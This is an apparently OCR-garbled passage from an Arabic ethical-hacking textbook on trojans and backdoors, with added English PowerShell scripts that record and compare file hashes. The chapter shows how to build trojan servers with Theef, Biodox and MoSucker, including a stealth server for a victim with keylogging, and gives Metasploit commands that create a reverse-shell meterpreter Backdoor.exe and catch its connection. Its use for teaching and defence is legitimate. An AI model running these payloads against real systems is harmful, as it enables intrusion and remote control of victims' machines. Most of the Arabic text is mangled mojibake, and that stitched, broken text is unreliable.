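            $out.Add([pscustomobject]@{ Status = 'Added'; RelativePath = $rel; Hash = $h.Hash })
        } elseif ($baseline[$rel].Hash -ne $h.Hash) {
            $out.Add([pscustomobject]@{ Status = 'Modified'; RelativePath = $rel; Hash = $h.Hash })
        }
    }
    # Files recorded in the baseline that are no longer on disk.
    foreach ($rel in $baseline.Keys) {
        if (-not $seen.ContainsKey($rel)) {
            $out.Add([pscustomobject]@{ Status = 'Removed'; RelativePath = $rel; Hash = $baseline[$rel].Hash })
        }
    }
    $out | Sort-Object Status, RelativePath
}

# Usage: baseline the drivers folder (one of the places the text says to
# check), then re-run the comparison later and review every reported file.
# New-IntegrityBaseline -Path "$env:SystemRoot\System32\drivers" -BaselineFile D:\baseline\drivers.csv
# Compare-IntegrityBaseline -Path "$env:SystemRoot\System32\drivers" -BaselineFile D:\baseline\drivers.csv
```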



SCANNING FOR SUSPICIOUS NETWORK ACTIVITIES 

6^lj^)ia A L ^Isu .(Jjrt^l g all ^Uaill C5 ic j^. AjjjuJI CjULjJI J^jj <^ ^J^A 3 1 (j^ 'SjLjall Jill ^ jzJi ^su 

4^^^. packet sniff erj aS^II ^a^li ~\ mi ji^\ $ A\ ^1] 4_jjjuJI cjU* jlx-a JLoijjj a£^l&1I <_£^>^.l <JL^jV1 



,4-kuijVl £>i& jj^j tilj^Qj ^Capsa 

Detecting Trojans and Worms with Capsa Network Analyzer 

http://www.colasoft.com : ja^JI 

JjLj ^>JI Jalisll iajj ^!j(LANs\WLANs) a_£L£111 aA^A\ cAS^\fkA^ol\ cjKi.ffl portable <^ 
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a/b/g/n802.11 

_A^Jjud]| ^I^^Jjol! djljLu ^JJjolflJ^ 

^ 1 aiyi ^ji ^<ji aj^UjI piijj ^cLaaj t Ajjjiii (JjLujjIIj t^jji&ivi ^j^Jij ciujjjyi aj*\ j-a 

<J£ Aj > >1J ^LALtU La-a 6A£jjaJl ^^ic 1 flJ - ^ a <j£ (jC t]\/[ACj 6 IP J^J 6 JJJ - *^ ^^>^ ^ tjjj^lillll ^-juJJ 

(j-a ^aJ Jj^>^i ^^>^ J t fru/i<ft 

. < flJ - b « (JS ^JJJ JJJ-<J1 dil£^a.j iVlj^Sl ^-^J (j^aSUll ^Jakll <J-al£3lj A£jjai3l jjjj^j 




Some Other Techniques For Using Trojans (6.6)



Creating a Server Using Theef

^ p% 6 jW^ Theef server .server j client of f^-^j jj^j ^ ^12 j^ks Theef 

^ jj^ill liA s j ^j >> i^ ^1^*3! 4^^kioij U Theef client ^ ,^ j^ > >>^ jU^ 

a > ^1 aJLojjL ^ jij L_a ^joj Theef servers < flLalt <jl ^aJ ^j^La ^ (JjSjj aJu\ ILLoj U1S La£ 11a C5 ic J jj^a^JI lie 

;aJU3I 5-JjLill la^a aJc ^ ^ < — * 'o* jj^^ ^ j Theef client aLJl Lai 



[Figure: Theef 2.10 client window: Connect dialog with the IP address 10.0.0.13 and port 6703, Connect and Disconnect buttons, and a log reading "Attempting connection with 10.0.0.13", "Connection established with 10.0.0.13", "Connection accepted", "Connected to transfer port", "Connected to server"]
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

I^VIS Networkj 'Home 'OS Info 'PC Details ^jj W^ll jU^ <> J! ^ 



[Figure: Theef "Computer Information" panel with the tabs PC Details, OS Info, Home and Network, showing the remote machine's user name, computer name, registered organisation and owner, workgroup, available memory, processor, display resolution, printer and hard drives]
.I^Sa j > ^j-aLkJI ^iilLJI CjUjjja Jj^ > >n j > ^all jt$^J screenshot JatSjJI <^*^ *j spy l3J^ '^ c ' 



Creating a Server Using Biodox

B t*SI jjVI c> ^ cr^ j GUI Trojan t> 6 jW^ j Theef j&j jj^jll ^Uij ^ ^ (J^ki ja Biodox 
AjltU) 3^uai J\ Uij^ BIODOX OE Edition.exe ci> J^h ? ^ J^-^ - 

.Qj, lW-*^ CS"^ 4jlU1 J^-^ <JujLaJl <j!)tk £yz 
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CoTwc^^San Port 

[Figure: Biodox OE Edition main window with connection and transfer port settings, an empty client list and a status bar]

<!LojjI ^jjj ^ill server *U^U ^ jSj c ^ J^ll ^ ^jja j-a y> U£ server editor f 



[Figure: Biodox server editor: fake error message, startup and install options, port settings (connection and screen capture) and an active/dead status indicator]

Create ^jj^jI tij* A ^ ^ Cjbl^VI ^i^jall jl jic JU^L ^ jij IP/DNS J^-^ <j' j^' c** 

aIujjj c_a jjoj ^ill server.exe ^-al^l *LijL ^ jIJ ^VtS server 




[Figure: Biodox server editor with the Port Settings tab (connection and screen capture ports) and install location options; status: Ready]
. JaxJI Iajj l_a jjoj a£ > r^ll jij j^ajj > J^-^ <^ server.exe * flLalt ^Uijl a*j ^jVI 
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I^VIS l& i jpujal \ ^jSj ^1 CjVU^jV! active/deactive status <ij* ^ 



[Figure: Biodox main window after the server connects, showing the connected machine's IP address, computer name, OS and RAM in the client list, with the server settings panel beside it]


Creating a Server Using MoSucker
server *L^b j^VI ja ^ jL .(Visual Basic Trojan) J ^l^ki^U I^jL^I ^ obi > MoSucker 



i^JUll jj^J CreateServer.exe (jj* ^^3^11 j^b ^ jfc server.exe *L£jV 



[Figure: MoSucker 3.0 Server Creator/Editor dialog ("Coded by Superdoofus, contains code from MoSucker 2.2 by Krusty, compiled for public release on November 20, 2002, VB6") with the choices "create a stealth trojan server for a victim", "create a visible server for local testing" and "edit an existing server", plus runtime-library, packing and key options; OK and Cancel buttons]



.Ok Cjj3 J^" U£ AjjJaljjaVI dibl^VI ^Ijjj 

pLuijj ^ajL <jU til^ikj ^jll j <JU3l <LiLi3l j^-laj ^2 .server.exe * flLall <j ajjj ^ill j ^jujVI tdi* t jll^j 

.server.exe 



[Figure: MoSucker 3.0 "Generating server" progress window listing build date and info and the steps: verifying necessary file paths, preparing first stub, preparing second stub, packing first stub, packing second stub, modifying file headers]
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fj&\ aJUII ^Uill (J±3a ^\ j .ok (jj^ server.exe ^ti^a ^jf^ ^J-^j (jj^i^a ^ j^-^ ^ 



[Figure: MoSucker server settings window with the tabs Notification, Options, Fake Error and Log (with "Enable Smart Logging" and a keyword list that triggers the keylogger), followed by the Server ID, crypt key, victim's name, server name(s), extension(s), a "prevent same server multi-infections" option and a Windows icon selector; Build and Cancel buttons]

.aJUII <jujLuJI lajfl MoSucker.exe (jj* ^ j-O^ j > lS^ 3 ^ lU*^ iSjj^I ^isu^lL ^ jiil L-i&ij ^jVI 




. A-iauJal lj jL^ajVI fJJ Connect cJJ* J^J f ^ 4_LiuJa3l IP jljj^ JU^L ^ j£j IP <jU. gi O^P>^ 



Creating a Server Using Metasploit

cilli <jc Uj^j L£ JU^j^I ^ msf console (Jjjia <.> g-K Jji&ll ^Ikb ^UJI metasploit J^Ij ^ 

: ^U3I jkJi ^ jij metasploit ^ ^ 
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > /Desktop/Backdoor.exe 

ic^VlS Enter ci> j^W ^ ^ 



msf > msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe
[+] exec: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"10.0.0.6"}

msf >
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ii^jji j^j IP j* LHOST J ^ 
.Backdoor.exe u^jj 15 ^ 

J jje^\ <c.U]a (Jjjia (jC Ji j t aLali ligj ^Via e-Lljl Jl ^-ULaJ c_fl jjuoS tA-l^jJall jt$^ J c qUll (JjJtij Asu 

: JVIS Metasploit 

use exploit/multi/handler 



msf > use exploit/multi/handler
msf exploit(handler) >






[set payload windows/meterpreter/reverse_tcp] f u^ 1 


msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.



[sessions -i 1] ^ji* <>- J&lijJI ciljl^a Backdoor.exe <ija J^j ^LS ^j^j 

1 ^ u^j lS^^I SUS ^LauV 

. JJall ^1 j\ aI^IujV Shell <C.Ula iilj£ dJ 4_l*jJa3l jl&^J jL^ajVI (J^asu 



(Trojan Countermeasure) l^jj^ 1 ^ S^UaaJI JjIaJI (6.7) 



.^sin^ll ^Uaill ajIa^JI jjs jj j jiaLkxJI ^ <Jlaj sjI > j^l^ll oi^ .Backdoor j s^l j^A 3 ^ ^>^1 .i^a ajLa^JI ja jj 
.tiL ^j-^LiJI ^Uaill J backdoor j s^j^A 3 ^ * u s ^ - ^ alia ^31 (_3ji=]i ^joaill 11a jjjj 



Trojan Countermeasure 

JiLa ULjakll ^jAslSI Jj l^-jli toi^ 6^1 j Ja ^ u ^i^l jnj>Vn LdAic. ^lllaj£ J^lli ^c^l^)j 6^1 j Ja ^jl > 

tlA jjc-j JjuJI CjU^Kj ^Ld^JjauJl ^UjjujIj c^jUujVI ^ilJaJ ^aSj Jlx* 4 ml > CjLg jlx-o <ajjuJ ^JjlLJl CjUjjJa Jjl^jalJ ;4_JJjoJ| CjIjUJI 
^jl - AjJa JaL^xJl cJ;ilajj 3 lajuljVI (JIa ^ ^JjalaixJl J ojalaixJl jJC. 4 U.VAfi l^jj] 4_iajJaj| ^UaJ Jc backdOOr 

B ^)ijauJl JJ^JI jl <JJ^>iJl iaLL<J3 <£jjaJl JJJ>» ^^>^ ^-^^^ 
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.tgj (JjJ j-a j^L^axJl (j-a CjI InJaliU (JjsljuiJj (J.ia^j t . iWI 

.ClAkulajllj JjajuliII 4 AiajV 4_i1gVI CjIjj^jIIj bUgS 
,^I^JjujVI cJ^ daLuj JJJ^I *Lail^a £tx»ljJ (j^aljSVIj a a a IaII ^aljSVl (J^a^S 

/a j&L^Jl a j> ^\\\ jl ^cxal jJ| liijjj ^ s a£*\ cJ^-^ J^lj^l AjIjS < . uaj 

.ialiJI oaai j 'auditing 'checksums c> ^ jU^l l lW CjUL s jtal 



Backdoor Countermeasures 
i^Vl^ j backdoor s^L^alt j^l^l u^»j <^ ^l^all (s^*^ j^) jj^*^ J j^l lW 

<jl£ lit J-l^Jl jJ ^-llc-j tdljjljyi (j-a lg-L jlS C5^^ ClA^Jjialll t . U^jJ jlaL^xa (jljaU ^Ld^JjaixJl t fljjjJ JjVI ^li^ll Jak 
^nJaJ ^jj ^jl t . la>J /a,j| Jj^a jA i^C* ^ fl^Jtlill ^^ic ftj^lS ^^jll CjLoi jj^l CjI aala (jj^J (jl (j^-aJ ^li-^l 

{security patch) djl -s > ^ ^iij* 4_Ljail jj CjI jl^-aj ^uv^ ^> Jila^JI (j^j^ dJUl! ^-liill 

.backdoor ^J'jjj J^- d*jj*j 'McAfee 'Windows Defender g*Lajj cjI^jj^I Cjlji ^1: 



Trojan Horse Construction Kits

(jl (j£^j tSjjjaa (jj£i (jl (j^j cijlc j ^ A\ d^a ^ CjIj^VI .l^jjjll^ ^^ill 6^lj^>ia 3 L ^Uj (jj-^l^xJI ^cLoij kits 6 ^ 

'Thck-fp.exe 'Thck-tc.exe ///^) c> uj^" Trojan Horse Construction Kit v2.0 

(> sjI jjL jU-aa. ^Uj jSaj t j-aljVl sbl u^jj^^ Thck.exe .Thck-tbc.exej 

dj|i djliLJI (jxi (^1 J*^ j t J jla (J\ (j-<i CjliLJI ^Uijj ^.l^ a\\ (j^j tli^ ^ > aUl jj^ Thck-fp.exe .^j^h^I 
iJ\ COM cJjj^j Thck-tbc.exe ^jI^j c> ^ ti^j j' JjL 

(ajS Time Bomb 

EXE u^W^ A sb ' > Progenic Mail Trojan Construction Kit (PMT) - 

.^ja J\ l^lLu. jV (PM.exe) 
JjUS/s^I jjla <i^aaJ ^UijV ^<u^ jj Pandora's Box 



(Anti-Trojan Software) lj^jj^I »jLi*« ^liukil! (6.8) 



CA ±* ^j;^ t * a ^^ * v ^ 4J^^xJl djU» jIslxJIj ciL (j^aLiJl jj jjj^II ^Uail <jl <LaJI j3 jj* ^^jll ^ alia djbljJa>Jl LLujaU ^3 ;liA JjS 

J jj^alj JJ jJJ^ll ^ aiaJl <LaJ (jl (j^J ^^jll fi^ljjia Aail^o ^1 JJ tilljA ^1 AiLjaVU .backdOOrj '^Ij^A 3 4i^»aJ ^ 

a ni^ll ^1 jJI (J-iLaxj jl <JI jl ^ (J-a^jj (jLa. jjiJI Ajja 4jail£^ll £c*l jJI .backdoor j *^l jj^ a\^^\ c5j^.VI djLd jl»^3! 

.S^ljjia JjJa ^1 jJl (jxi ^jAxJI t fl - ^jaill I^A 



Anti-Trojan Software: TrojanHunter 

http://www.trojanhunter.com 
JiLd SjLjal! ^cxil jJI ^1 jj| 24^- cJj j^j t * a -'*^j (_^i3l <lifiJI cjlkulalll ^j-a^li jA TrojanHunter 

.4> ^UJI jjjjfaSlI jU^> (> i dialersj 'adware 



6(JjJJUd^j3l ^L-dljJj o^ljjJa <J 
~ a( jL U£ TrojanHunter ^0*** <> ^ 

.S^ljjla 4_L^a^l c miI^I C5 lc oj^ll A-lkjt-j CjULJI ^ 4_l3lsrJl <C jjuJI 

jiiL<JI (jl^ jjj lali* ^jc c Lu&13 iaLLall (j^a^a 
\ ilalS cjUs ^ jjSJI ^ s jiS ^ j 'TrojanHunter c> yr* 'uW> jj^ Jjk2ll 



t *±A\ <>» L&*j lij SjI jjla (jl^a^ c^l c-ijuaSS - s jSlil! ^jL (jjj jUJI TrojanHunter 



[Screenshot: TrojanHunter scan window, with the Update and Start controls and the Desktop / My Computer / Local Disk (C:) folder tree selected for scanning] 



Anti-Trojan Software: Emsisoft Anti-Malware 



http://www.emsisoft.com/en 
4j ^UJI ^IM3 Aijj^ ajU^ jSjj Emsisoft Anti-Malware 



jLo! jjjfll! ^-ail-i^) ^ * *b ^ 1 cijL^UII ^> jjjjI ^ ^ ji^j .rootkitsj * Jj^ 'bots 'worms <adware ^ 



[Screenshot: Emsisoft Anti-Malware "Scan computer" results view after a finished scan, listing the detected objects with their risk level and a note that clicking a detection name opens further information in a new browser window] 
Anti-Trojan Software 

(j^xj Uua j t iAA hi J j^^3 laU> djlLfki j tSjLjall ActiveX jj^a Uc ^backdoor jj^ j 'worms jj^ a\,^\ 

Anti-Trojan Shield (ATS) available at http://www.atshield.com 
Spyware Doctor available at http://www.pctools.com 
Anti-Malware BOClean available at http://www.comodo.com 
Anti-Hacker available at http://www.hide-my-ip.com 
XoftSpySE available at http://www.paretologic.com 
SPYWAREfighter available at http://www.spamfighter.com 
Anti-Trojan Elite available at http://www.remove-trojan.com 
SUPERAntiSpyware available at http://www.superantispyware.com 
Trojan Remover available at http://www.simplysup.com 
Twister Antivirus available at http://www.filseclab.com 



(Penetration test) Jtj^VI (6.9) 



cjI^suII Ai^x-<J till ^joij !a& .li^ djj^Ja ^^jJI ^ j^g-^ CjLi^I tdli Loj ^ j^g-SI djUjij ^llo j& Ui J£ jjiis t . l^j .backdoor 



Pen Testing For Trojans and Backdoors 

CurrPortsj TCPView ^Ij^l e 1 ^ 1 
AjjUJI CjLIaxJI (jazJZ :2 S jlaaJI *t 

6 What*s Running j^^ t^iir_Ju3l cjULic (j^a^a j ^t_uu3I ^js CjULixJI ^j^>^^ l^^A 3 c 4^11 

registry ^VIajI q^zJZ :3 SjkaJI -4 
.PC Tools Registry Mechanicj JV Power Tools ^1 j^VI t> *^L^ ^ t*Ui jl .registry cjV^I o- 3 ^ 

(Jjistjujj ^cxiljJ (Jii^ (j-d D^ljjla 4_lk^a^.l jjaUJJ _ jl^_aJl (Jjistjujj ^c-alijJ L— lliLa £y± backdOOrj *^J^h 4_l^a^.l ^jJa jl\ 

L>« U j^j J^-^ djUL L-JJj ^ll Clip. 6 j^Vl 

a I ikiLuji t jj^jjj djU»Ak j^^q! <iajj^<J! iiiiil] ALlil! CjULaII (j^^ l'aa jf^>Jl Windows ^-j^^ c^l t " 1 N ? j 

.ServiWinj SrvMan ^jIj^I 
'Starter ilj^l i^iLujI j ^ixjaLill ^.^j c-H 3 ^ 6til3i3 . Windows cJ^*-^ Ujlils cJxju^j s^lj^Ia a l 

5^ ^ j* 2 *' ^ j ^ J^ull jj ^3^31 jAutoruns j 'Security AutoRun 

djU3l j ^IDSesj 6 ^U^ l^j-^^ jj^ f° ^ ^ cijliLill ^Ia^LujI ^ ^Uaill jjljlkV (jj^l g ^11 <jjou31j j^U! cJ^jujI Cy* 
.Backdoor j ^ j^A 3 ^ ^ ^>^V djI^i^JI j dAiLJI <j^a^i ^I^j t^Ulbj j^-g-Ii <j-a ^ jill 11a ^ JJoij ^ ^A^l 
WinMD5j <FastSum SIGVERIF TRIPWIRE < FCIVJ^ f ^l^Mlj ^ULII ^ ^ 

4^j) ikduV o^i :8 S jial *t 

cs^j Capsa Network Analyzer cjIj^I ik&Vl £>iA JS* o-* 1 ^ .^'jj^ uW^' 

(j^l^JI AjjIIaj Uj^j j! TRIPWIRE *\ ikUj Jjxj&II ^Uaj CjliL ^£ l_^!>Ij3I jl cj!1jAxj3I ^1 ^ j^j L >^^i < 



(jl^jjj ^1 ^ < flnt^U (jl^jjj Q^^li JJLuu :10 SjJakJl 4_ 
Jj xjuH j ciiiiij <Lj -L 3jjoi3I ^ Emsisoft Anti-Malware j TrojanHunter l!^ u^-jj^ ch^-^ 

^uinil ^la^ :ll d jia^ 4- 

CjLuu jjji]) 4 a at < a jualjj ^u^'i ^ Ul Lai .^UaI2) A Ijt nil Ajji^L ^ cCjLuu 4 a At < a jc-aIjj <*uV\*i ^ ^ 
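The checksum tools named in the steps above (FCIV, FastSum, WinMD5, TRIPWIRE) all work the same way: record a hash of every file while the system is known to be clean, then re-hash later and report anything added, removed or changed. The PowerShell script below is an added example of that baseline-and-compare approach; it is not code from the original text or from any of those tools. The monitored directory (`C:\Windows\System32\drivers`) and the baseline file location under `$env:ProgramData` are assumptions and can be changed freely.

```powershell
# Added example: file-integrity baseline and comparison, the approach behind
# FCIV, WinMD5, FastSum and TRIPWIRE. Not code from the original page or from
# those tools. Requires Windows PowerShell 5.1 or later (Get-FileHash).

function Get-FileBaseline {
    # Hash every file under $Root with SHA-256 and return a path -> hash table.
    param([Parameter(Mandatory)][string]$Root)
    $table = @{}
    Get-ChildItem -Path $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $h = Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
            if ($h) { $table[$_.FullName] = $h.Hash }   # locked files are skipped, not fatal
        }
    return $table
}

function Compare-FileBaseline {
    # Return the paths that are new, missing, or whose content hash changed.
    param([Parameter(Mandatory)][hashtable]$Old, [Parameter(Mandatory)][hashtable]$New)
    $report = @{ Added = @(); Removed = @(); Modified = @() }
    foreach ($path in $New.Keys) {
        if (-not $Old.ContainsKey($path))    { $report.Added    += $path }
        elseif ($Old[$path] -ne $New[$path]) { $report.Modified += $path }
    }
    foreach ($path in $Old.Keys) {
        if (-not $New.ContainsKey($path))    { $report.Removed  += $path }
    }
    return $report
}

# --- usage ---
# Assumed values: any directory and any writable baseline path work.
$Root         = 'C:\Windows\System32\drivers'
$BaselineFile = Join-Path $env:ProgramData 'integrity-baseline.xml'

if (-not (Test-Path -LiteralPath $BaselineFile)) {
    # First run on a known-clean system: record the baseline and stop.
    Get-FileBaseline -Root $Root | Export-Clixml -LiteralPath $BaselineFile
    Write-Output "Baseline of $Root written to $BaselineFile"
} else {
    # Later runs: re-hash and report every difference from the baseline.
    $old  = Import-Clixml -LiteralPath $BaselineFile
    $new  = Get-FileBaseline -Root $Root
    $diff = Compare-FileBaseline -Old $old -New $new
    foreach ($kind in 'Added', 'Removed', 'Modified') {
        foreach ($path in $diff[$kind]) { Write-Output "$kind`t$path" }
    }
    if (($diff.Added.Count + $diff.Removed.Count + $diff.Modified.Count) -eq 0) {
        Write-Output "No changes under $Root since the baseline."
    }
}
```

Keep the baseline file somewhere the monitored host cannot rewrite it (removable media, a signed copy, or a separate management host): a trojan able to replace a driver can just as easily replace a baseline stored beside it, and the comparison then reports nothing. Rebuild the baseline only after a verified-clean state, such as immediately after patching from a trusted source.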